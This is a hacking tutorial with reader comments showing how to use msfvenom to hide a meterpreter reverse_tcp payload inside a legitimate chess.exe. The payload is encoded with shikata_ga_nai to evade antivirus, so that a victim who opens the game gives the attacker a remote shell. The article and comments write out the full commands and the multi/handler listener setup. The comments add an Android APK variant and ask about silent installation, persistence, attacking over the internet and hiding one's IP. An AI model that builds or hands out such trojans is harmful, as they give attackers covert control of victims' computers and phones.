Hack Like a Pro: Metasploit for the Aspiring Hacker, Part 5 (Msfvenom)

Metasploit for the Aspiring Hacker, Part 5 (Msfvenom)

Welcome back, my hacker novitiates!

Eluding and evading antivirus software and intrusion detection systems is one of the most critical tasks of the hacker. As soon as a new exploit is developed and discovered, the AV and IDS developers build a signature for the attack, which is then likely to be detected and prevented.

One obvious way around this problem is to develop your own exploits, and that is what we have begun to do in our Exploit Building series. Another potential method is to change the encoding, thereby changing the signature of the exploit and/or payload.

Previously, to re-encode a payload in Metasploit, you had to pipe msfpayload through the msfencode command as shown in this tutorial. Recently, Rapid7, the developers of Metasploit, introduced a new command that takes the place of the clunky combination of msfpayload and msfencode to streamline the process of re-encoding a Metasploit payload. Let's take a look at it in this guide.

A Quick Note About Re-Encoding Payloads

Re-encoding a Metasploit payload used to work for evading AV and other security devices, but the people who develop AV software are not dumb. They have now found ways to detect even a re-encoded payload from Metasploit.

Now, rather than just look for the signature of the payload you have encoded, they simply look for the signature of the template that Metasploit uses to re-encode. In this way, no matter how many different encoding schemes you use, the template is the same and the AV software has its signature.

Don't fret though, there are still ways to re-encode a payload that are still undetectable by AV software. I will be starting a new series soon on evading AV software where I will demonstrate many of the ways, so stay tuned for that.

Step 1: Fire Up Kali & Start Metasploit

Let's start by firing up Kali and opening the msfconsole. You can do that by simply typing "msfconsole," or you can use the GUI and go to Applications -> Kali Linux -> Top 10 Security Tools -> Metasploit Framework. When you do so, you will find yourself in this interactive Metasploit shell.

Step 2: See the Msfvenom Options

Now, at the prompt, type "msfvenom" to pull up its help page (you can also use the -h switch).

msf > msfvenom

Let's take a look at some of the most important options in this list.

  • -p designates the Metasploit payload we want to use
  • -e designates the encoder we want to use
  • -a designates the architecture we want to use (default is x86)
  • -s designates the maximum size of the payload
  • -i designates the number of iterations with which to encode the payload
  • -x designates a custom executable file to use as a template

Step 3: List the Encoders

Encoders are the various algorithms and encoding schemes that Metasploit can use to re-encode the payloads. Metasploit has numerous encoding schemes, and we can look at these by typing:

msf > msfvenom -l encoders

Metasploit will then list all of the available encoders with each's rank and description. Below, I have highlighted the shikata_ga_nai encoder that we used in a previous tutorial. Note that shikata_ga_nai is ranked "excellent."

Step 4: View the Payload Options

We can use msfvenom to check the options that we need to set for any payload similar to "show options" in the Metasploit console. The command to check any payload's options is:

msf > msfvenom -p <payload name> -o

So, if we want to check the options for the windows/meterpreter/reverse_tcp payload, we simply type:

msf >msfvenom -p windows/meterpreter/reverse_tcp -0

When we do so, Metasploit responds like below.

So, if we want to work with this payload, we now know what options we need to set in the msfvenom command.

Step 5: Create a Custom Windows Executable

Now, let's create a custom Windows executable with a custom template. Although we can create a payload without a custom template, we have a better chance of getting past security devices and AV if we use a custom template. In this case, we will use a chess game named "chess.exe." The idea here is that we will embed the meterpreter payload into the chess game and then, when the victim opens the game to play chess, it will open a meterpreter session on our system.

I have placed the chess game in the /usr/share directory.

To create a malicious executable with the windows/meterpreter/reverse_tcp embedded inside, we simply type:

msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST= <your local IP> LPORT=<whatever port you want to listen on> -x /usr/share/chess.exe -e x86/shikata_ga_nai -i 200 -f exe >chess.exe

  • -p /windows/meterpreter/reverse_tcp designates the payload we want to embed
  • LHOST designates the local host
  • LPORT designates the port we want to listen on
  • -x designates the template we want to use and the path to it
  • -e x86/shikata_ga_nai designates the encoder we want to use
  • -i 200 represents the number of iterations
  • -f exe designates we want to create an executable (.exe)
  • chess.exe designates the name of the file created

When the victim clicks on the chess.exe file, the meterpreter payload will be activated and will look to make a connection back to your system (LHOST). For the connection to succeed, you will need to open the multi-handler in Metasploit to receive the connection.

msf >use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp

This new command in Metasploit, msfvenom, can streamline the process of re-encoding and embedding payloads, but is no guarantee for getting past AV software any longer. I will be starting a new series on evading AV software soon with the latest techniques, so keep coming back, my hacker novitiates!

Cover images via Shutterstock (1, 2)

68 Comments

hello sir, i'm new here. i know this is out of the subject, but i'm going to university soon and i need your advice whether to take the computer science program or information technology program. Any information helps, thanks btw!

PS: my goal is to become a great hacker like you lol

Either path can help you become a great hacker. At most schools, the computer science program is more rigorous and will provide you greater depth. The information technology program will likely get a quicker start and then you can continue your education in security and hacking.

thanks sir OTW for your advice, i think i will take the information technology program as i'm not really familiar with programming yet.

Also, is it true that to bypass AV and find zero-day vulnerabilities, you have to be really good at coding ?

zst hold ur path and keep learning and practicing thats can make u hacker ... last of all this website will help u much :P btr thn a school :D

whr i will get tht output malicious file .?? becoz size of my file resides in /usr/share not changed.??

King, You'll get the output file in the working directory of MSF. To specify, I usually do "> /root/out/file.exe" just to stay more organized.

Edited to delete...(please downvote so it dissapears :p)

OTW

Hi, I am new on here and I've been following your tutorials, so far it's been great, amazing and pretty much easy to follow. Pls keep on these lovely and great works.

However, I've tried encoding an executable file just like above in your post and AV just won't give me a chance, even on my Grandpa's PC.....

So, I'm really counting on your words that you'd post other better ways to bypass AV, I know you must be a busy man and probably have so much on your hands, but I'd really appreciate it if you can make it soon....PLEASE!!!

Thanks In Advance

Phoenix

Metasploit encoding is not designed to evade AV but to deal with bad characters, etc. You can use executable envelopes which encrypt the executable. I suggest looking into the Veil framework.

OTW,

I followed your tut as precise as i could. But i still get stuck on the part when i open the payload on my VM windows 7 it says it dont respond and i get no connection back to my kali linux that has the same IP and port (on LAN). It just says "Starting the payload handler". I belive it might be a connection problem but I´m not sure.

Are you certain you can connect? Can you ping the system?

I found the problem: I was using Oracle VBox and it uses 10.x.x.x IP´s (I used 192.168.1.x) though i could actually ping the system. I have reasolved it by using a computer outside my LAN to see if it works and it did. I still cant change the VBox IP but at least it works.

You can change the IP inside VBox by simply typing;

ifconfig eth0 newIP address

Just a small question. Could you please tell me what the iterations option does?

The iterations option determines how many times the encoding scheme is run.

Thanks for the clarification

I am facing a problem here. Searched all over the internet.
"Offset 0 outside of image source"

somebody please help with this error

Mathew:

You really aren't giving us any information to work with. How about a screenshot?

It was my bad. I thought you could just do it with any .exe file. So I had created a notepad file and saved it as. exe. That was the problem. Anyway, I downloaded a chess game setup and tried to do with that but that too returned an error. Could you please tell me the reason for that? I, then, installed the game and used the .exe file of the game. The infected file was made but when I tried opening it on the target system, it just won't open. I tried with vlc.exe (VLC media player) too but same problem. The infected file is not opening. The target system is running on Windows 8.1. What could be the problem?

Mathew:

It's really hard to diagnose your problem and help you with so little information. Could you send some screenshots to help us understand what you did and what might be going wrong?

OTW

Also the infected file has a size of just 6kB whereas the original file was over 8MB. I have attached the screenshot showing how I created the file.

From this screenshot, it looks like you copied the command incorrectly. There is a 0 before the f that should not be there.

Please check you typing first, before presenting your problem to this forum. We are not here to correct your typos.

Extremely sorry about that post. Really sorry. I corrected my mistake but the file is still not opening. I disabled the antivirus and the firewall also.

Where did you get this executable template? It is most likely the source of you problems and msfvenom isn't able to properly insert the payload. Try one of the default templates in metasploit before trying your own. The default templates are located in the /usr/share/metasploit-framework/data/templates directory.

Thanks for the tutorial, ((i made a c++ program a while back that generates a script that randomly uses different encoders ))

Anyways what i am interested in is how can you make the payload persistent where it calls back to the attacker machine every half hour or so?

Another cool thing would be how can i make a free server online and have the call back go to there?

Well, just set the LHOST to the server IP.

I don't know about "persistent," but I do know it's possible. You might have to make your own shellcode, though. I'm pretty sure MSFVenom doesn't come with an option like that.

Hello!
Consider that I am very, very beginner using metasploit!

I saw many tutorials teaching create payloads for android but all teach only how to create a unique apk for the payload. It would be possible to embed the payload in a apk (or for exepmle a picture ) already existing in the same way that is done in this tutorial (creating a custom picture or apk with a custom picture or apk template) ?

Thank you!
Sorry bad English ! (google translate)

Yes its possible! The command is as follows:

msfvenom -p android/meterpreter/reversetcp LHOST=<your ip> LPORT=<port> -x <existing apk file> R -o <file to output>

  • The -p option selects the payload
  • The -x option selects the template file (file you want to add payload to)
  • The R stands for shellcode
  • The -o option means your output file

So, this command reads, create a file with the payload of the android meterpreter using the template file and make a new file with the payload in it...

I couldn't make it work

No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload

hey, thanks for the tip! does this still launch in the phone? and is there a way to install it silently?(without user interaction after editing the Manifests of the apk?

I am typing the command

msfvenom -p windows/meterpreter/reversetcp LHOST=192.168.1.88 LPORT=4444 -x notepad.exe -e x86/shikataganai -i 200 -f exe > evil.exe

And all it outputs is a 0 byte file that Windows can not run. The command runs fine.

Good tutorial. I just am wondering can I use a dynamic DNS name instead of a public ip address when making the trojan.apk IE name.servehttp.com. Also, can my ip be tracked by doing this. Would it be good to use a VPN of somekind when deploy this hack.

Hello !

I'm beginner using metasploit I successfully make a payload following your tutorials and tested it with windows 8 and it works . My question is how can i hack a remote computer in WAN ? I only tested it on LAN .

Thank You
Sorry for the bad Englsih

You can set the LHOST to your external IP I believe.

Hi when I try to find the options for the payload, it won't come up for me. here's my screenshot. sorry very new to this.

file:///root/Pictures/Screenshot%20from%202015-09-26%2021:45:54.png

sorry it won't seem to let me upload a picture but it says error: missing required argument for option.
thats after I type msfvenom -p windows/meterpreter/reversetcp -o

couldn't we just run killav.rb to stop the AV?
(sorry I found this thread late)

Kill.av only works after you have the payload on the system. In many cases, the AV will keep you from ever getting the payload on the system.

In one of the other guides ("spying one") we had to specify the exploit we had to use, like the "use exploit/windows/fileformat/ms14017rtf" in this guide I did not see where we would do this in this guide.

Is this a totally different thing?

Also is this persistent so that we may come back to the victim later?

Thanks

The payload is specified with the -p (for payload) option. It's written above,
"-p /windows/meterpreter/reverse_tcp designates the payload we want to embed"

Also to answer you second question, this has nothing to do with Persistence. Once you have a meterpreter session you can run you post exploitation modules including persistence pivoting etc..

Hello!
Before I start I'd like to say this is a very good tut. Nice work!

I followed your tutorial and I successfully created a payload, but its size is 0bytes. I retried many times but still the same result. I can neither open it on my (test) phone as it shows "Error parsing the package".

Am I missing something? Please help me.
Thanks in advance!!

The results you cite are usually a result of typographical errors. Can you post of screenshot?

Here is a screenshot. As you can see, the command was executed successfully without any error message but the payload (ie FinalPayload.exe) is 0bytes.

Image via tinypic.com

My guess is that the file Core-Temp-Setup.exe either doesn't exist, is empty or is not an exe.

It really exists. I put it there myself and I have tried with other exe files.

You need to use one of the default templates built into Metasploit. Metasploit can't work with your exe.

hello Sir

Firstly I am very thankful to you for the information what you gave us is absolutely great, I am having a small doubt if I want to send that file instead of game by other means like port forwarding etc.... How to send please can you tell me the process that I have to follow .This is purely for educational purpose not with any other intention being b-tech computer science student I want to learn hacking and become a ethical hacker and a pro like you Sir, So if you understand please help me with the required information

Thank you
Sir

Welcome to Null Byte!

I'm not sure what you are asking here. Will you try re-stating your question?

OTW

I opened metasploit framework, typed in: msfvenom . It is showing " * exec: msfvenom" (without quotes") .After few seconds ,I automatically gets returned to msf prompt.I am using Latest Kali Linux(as per jan 2016).Please help,sir!

msfvenom is seperate from metasploit.

Try running msfvenom from terminal, not from inside msfconsole.

Hi everybody. I am having the same problem. I can't view the payload options.
On that soame note, I can only view the encoders and msfvenom options if I run under sudo.
I am running metasploit from the terminal, not from inside msfconsole.
Can anybody tell me what could be wrong here? Thanks.

Hello!
When i try to run the .exe on my Windows VM it just crashes (don't respond).
I used the templatex86windows.exe from metasploit (VM OS: win7x86).
The encoding worked without errors and I can ping my vm / host.

I also tried it with another encoder, then the program doesnt crash and I see that the VM tries to reach my host (wireshark), but still my shell won't open. I started the handler and set all options (LHOST,LPORT).

Does someone have a clue what i could be missing?
Thanks!

Did you ever figure this out?

I'm interested if you have found a solution of your issue.

I am typing the command

msfvenom -p windows/meterpreter/reversetcp LHOST=192.168.1.88 LPORT=4444 -x notepad.exe -e x86/shikataganai -i 200 -f exe > evil.exe

And all it outputs is a 0 byte file that Windows can not run. The command runs fine.

Change "reversetcp" to "reverse_tcp"

Sir i am getting this error while running msfvenom, msfpayload

Can you please help me.

Hello Sir, i'm new here but i'm having some issues with msfvenom to where it'll make payloads just fine except for one thing when i send the payload to my computer and open the file it'll open just fine but msfconsole won't get a connect back and i'm just wanting some help with that issue

Hello OTW,

Like some of us, I am having trouble with taping the following command :
msfvenom -p windows/meterpreter/reverse_tcp -o

metasploit always return the same answer : error: missing required argument for option.

I have been trying to check where I did a mistake but I can't figure it out.
Hope you'll help :/

Kane

Do msfvenom -h and check the options for payload

Hi OTW,
I was wondering on how to find your local ip, is it from your router or when you look it up "ip" on google?

Your local ip it's the ip address of your local machine.
Your ip address on google it's your public IP that can be reach from internet.
Do ipconfig on windows and ifconfig on Linux system

i have encountered this issue and I have tried the same argument inside msfconsole and without it thereby I failed to create the chess.exe file as well. my computer OS is windows 10 and x64, msfconsole successfully worked out but cannot figure out the relevant problem. Note that I also used the statement following the Usage statement.

Anyone Can help me with this? I cannot proceed to the next

Also have a look at this please.

Share Your Thoughts

  • Hot
  • Latest